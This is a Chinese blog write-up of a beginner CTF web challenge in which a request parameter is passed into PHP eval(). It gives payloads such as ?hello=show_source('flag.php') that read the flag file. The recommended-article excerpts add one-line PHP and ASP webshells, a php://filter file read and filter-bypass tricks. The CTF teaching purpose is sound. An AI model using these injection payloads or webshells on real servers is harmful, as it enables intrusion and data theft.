CTF之eval

最新推荐文章于 2024-05-17 00:00:22 发布
最新推荐文章于 2024-05-17 00:00:22 发布
阅读量433 收藏 5
点赞数 9
分类专栏: ctf 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74263993/article/details/138258228
版权
本文详细介绍了PHP中的eval()函数,它如何处理字符串作为代码执行,以及$_REQUEST全局变量在收集HTML表单数据的应用。同时提到了如何通过GET、POST和COOKIE方式传递参数给函数。
摘要由CSDN通过智能技术生成

 首先我们先了解一下eval()函数

什么是eval()?

eval() 函数把字符串按照 PHP 代码来计算。

该字符串必须是合法的 PHP 代码,且必须以分号结尾。

如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。

所以在这个题中会执行var_dump($a),而var_dump()就是一个输出函数,相当于print_r(),只是输出格式不同

接着便来了解另一个函数 $_REQUEST[]

在PHP中,$_REQUEST是一个超全局变量,用于收集HTML表单提交的数据。它可以获取通过GET、POST或COOKIE方法提交的数据。

$_REQUEST变量是一个关联数组,它的键是表单元素的名称,值是用户输入的数据。通过$_REQUEST变量,可以访问表单中所有输入字段的值,不论它们是使用GET、POST还是COOKIE方法提交的。

所以我们可以通过  ?hello= 来进行传参

可以用?hello=show_source('flag.php')

也可以用?hello=file('flag.php')

 flag{516c19dc90802e80dc6e3747f5f338b0}

小黑子不会打篮球
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
CTF从入门到提升(十六)代码执行相关函数及例题分享
anquanniu的博客
09-17 742
代码/命令执行 比如说能够对一个php的站点,控制php代码,那么我们就把它划分为代码执行,如果能执行网站所在服务器中的命令,我们这就把它划分为命令执行,因为它执行的是系统命令。 一般来说代码或命令执行漏洞都存在一个相关函数,通过控制部分参数传递到函数中实现命令执行。说到CTF题型中的这种攻击手段,一定要知道哪些函数能够被利用需要我们去关注的,首先会带大家了解一些代码注入的相关函数,例如执行...
CTF/合天网安实验室-web100题解【eval与alert的利用】
Sp4rkW的博客
08-15 7817
原题内容: http://www.hetianlab.com/CTFrace.html web100打开可以看到只有一个很干净的zip文件下载(忍不住扫了一下目录,也bp看了一下,,没啥发现) 回到下载,解开压缩版,web100,无后缀名,个人的经验是不急着加后缀名啥的,直接用记事本直接打开 可得代码如下: <script>_='function $(){e=g...
ctf 文件包含
weixin_45942044的博客
03-28 228
一、eval() 函数 一句话木马 <?php eval($_post[0]);?> eval()函数作用:将函数内的字符串当作代码来执行 使用蚁剑连接一句话木马,需要输入密码,密码值为post[]中的值。 二、通过php://filter获取flag ?php://filter/read=convert.base64-encode/resouce=flag.php 三、通过php://input获取shell ?php://input 在hackbar的post里写入&lt
ctf web方向与php学习记录5之eval()初见
这周末在做梦的博客
08-22 2975
由于bugku的本地包含无法打开,故找了其他人解题的过程以供学习。 https://www.cnblogs.com/0yst3r-2046/p/11062755.html 在本次学习中我将我学习的相关的原理和知识分享给大家,如下。 一,初见eval,智商开始下线 eval()函数中的evalevaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行,一般情况下不建议使用容易被黑客利用。 (1)定义和用法 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是是完整,合法的PH
CTFHUB——RCE之eval执行和文件包含漏洞
m0_46467017的博客
08-31 5093
代码解释:本关代码和第一关文件包含一样,通过strpos函数判断参数是否存在flag字符,存在就执行include函数。因为本关没有限制php://input伪协议,所以本关解法和上一关一样,这里就不再赘述了。代码解释:本关代码和之前php://input关卡一样,通过substr函数来判断file参数是否等于php://,如果等于就执行include函数。代码解释为如果存在cmd参数,那就用eval函数执行cmd参数中的代码,所以本关存在命令执行。连接成功后,其余步骤与上一关相同。...
CTFHub-Web-RCE-eval执行
qq_54037445的博客
11-29 883
eval ()是一个危险的函数,它使用与调用者相同的权限执行代码。如果你用eval() 运行的字符串代码被恶意方 (不怀好意的人) 修改,您最终可能会在您的网页/扩展程序的权限下,在用户计算机上运行恶意代码。
CTFHub | eval执行
尼泊罗河伯的博客
04-19 1221
eval 函数可以将字符串作为代码执行,那么在使用 eval 函数作为获取用户输入的时候应该避免使用这类函数。如果用户输入的是一段恶意代码,就会导致严重的安全问题。
php eval ctf,浅谈CTF中命令执行与绕过的小技巧
weixin_39758618的博客
03-16 1296
*本文原创作者:pupiles,本文属FreeBuf原创奖励计划,未经许可禁止转载缘起lemon师傅在安全客里发表的一篇文章,总结的很详细,学到了很多姿势。但是在此我还想画蛇添足的做一些补充及解释。补充一下命令执行的漏洞。空格绕过< 符号%09 符号需要php环境,这里就不搭建啦,见谅)$IFS$9 符号${IFS} 符号这里解释一下${IFS},$IFS,$IFS$9的区别,首先$IFS在...
eval-Bugku CTF
m0_56859693的博客
09-05 1393
今天在bugku刷到了一道基础题,感觉考察的很全面。 源代码如下 第一行 include是将flag.php包含在页面代码中,也不难推测flag在flag.php中 第二行 $_REQUEST可以将用户传入的hello传给服务器 第三行分两个部分:eval和var_dump var_dump即把输入的hello作为字符串string输出 eval则可以把字符串当作php代码执行 把hello赋值为system("ls") 发现包含flag.php和index.php ...
python 计算器 eval ctf_CTF逆向--.NET与Python篇
weixin_42127835的博客
01-13 591
题目(来源:Jarvis-OJ):Classical CrackmeClassical CrackMe2FindKeyLoginClassical Crackme首先查壳 没有壳,不过发现这是一个.net的程序,将其拖进dnSpy中,找到主程序,同时发现关键代码,如下所示:private void \u202C\u200B\u206A\u202A\u206D\u206B\u202D\u2...
CTF-5#进击!拿到Web最高权限-WP
10-23
我们需要新建一个txt文本文件,内容为asp一句话,asp一句话可以随便百度一个就行,比如:<%eval request("MH")%>。保存,后缀改为.asp,这里命名为1.asp。然后,我们可以上传这个文件,但是会报错,发现对上传的文件...
江苏科技大学校赛JUSTCTF个人writeup
01-17
baby_upload 由题目可知上传一句话木马 <?php eval($_POST['a']) ?>,然后上传用 Bp 截取修改后缀.php,然后蚁剑链接发现 flag。 十、七海 Nana7mi 七海 Nana7mi 使用 010editor 打开图片,在乱码中有 flag,可以...
CTFShow-周末大挑战parse-url篇Writeup
05-19
第六关,通过在URL中插入JavaScript代码 `<script language="php">eval($_POST[A]);</script>`,试图执行POST请求中的PHP代码。这意味着服务器可能同时解析PHP和JavaScript,存在跨语言代码注入的风险。 这些关卡...
命令注入讲解ppt.pptx
08-10
1.外部参数可控应用程序调用了能够执行系统命令的函数,比如服务器程序通过 system 、 eval 、 exec 等危险函数直接或者间接调用了 cmd.exe 。而攻击者恰好能够控制这些函数的参数,比如可以通过浏览器或者一些其他...
BugkuCTF_Web——“秋名山老司机”、“速度要快”、“cookies欺骗”
Ho1aAs‘s Blog
10-11 856
文章目录一、“秋名山老司机”二、“速度要快”三、“cookies欺骗”完 一、“秋名山老司机” 开启环境,提示要在两秒钟计算结果 多次刷新发现每次的值不一样,并且知道了答案要通过赋值给value然后post上去 想到可以通过获取网页源代码使用eval()执行算式 编写以下python脚本 #requests实现请求,bs4获取标签内容 import requests,bs4 url = 'http://123.206.87.240:8002/qiumingshan/' #由于每次刷新后算式会不同,需要
CTF网络安全大赛简单web题目:eval
最新发布
Pythonit教程网
05-17 1531
(错误控制运算符)等可能引发安全问题的函数。这个PHP脚本有几个关键部分,但首先,它是不安全的,因为使用了。红客网:blog.hongkewang.cn。只需要在web的url后面加上参数“题目来源于:bugku。一道简单web的题目。
ctf命令执行小结
舞动的獾
10-04 4481
1.相关函数 eval函数eval函数能够将字符串当作命令去执行 需要被执行的字符串 代码不能包含打开/关闭 PHP tags。比如, ‘echo “Hi!”;’ 不能这样传入: ‘<?php echo "Hi!"; ?>’。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 ‘echo “In PHP mode!”; ?>In HTML mode!<...
ctf中misc解题方法
08-01
CTF中的Miscellaneous(简称Misc)是指一类涵盖了多个领域的题目,常见的包括密码学、网络协议、二进制分析等。 在CTF比赛中,解决这类题目的方法主要有以下几种: 1. 阅读题目描述:首先要仔细阅读题目描述,通常会提供一些线索或提示,例如题目类型、题目背景或所需的技术知识。这些大致的信息能够帮助你确定解题方法的方向。 2. 分析题目附件或源代码:如果题目提供了附件或源代码,要仔细分析其中的内容。有时可能需要进行逆向工程、二进制分析或查找隐藏信息。需要注意的是,不同题目类型可能需要使用不同的分析工具和技术。 3. 猜测和尝试:在整个解题过程中,可能需要多次猜测和尝试。例如,对于密码学类题目,尝试使用不同类型的密码学算法进行解密;对于网络协议类题目,尝试使用Wireshark等工具进行数据包分析。 4. 查找前人的经验:CTF解题是一个积累经验的过程,很多题目类型都有经典解法,可以通过学习前人的经验来提高解题效率。可以参考CTF比赛的writeup、CTF讨论论坛或CTF相关的学习资源等。 5. 团队合作:在解题过程中,可以与队友或其他选手进行合作,分享解题过程中的思路和发现。这样可以锻炼团队合作的能力,也能够快速找到解题思路或解题方法。 综上所述,CTF中Misc题目的解题方法主要包括阅读题目描述、分析附件或源代码、猜测和尝试、查找前人的经验以及团队合作等。通过不断学习和实践,提高解题的技巧和经验,才能更好地应对各种Misc题目的挑战。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值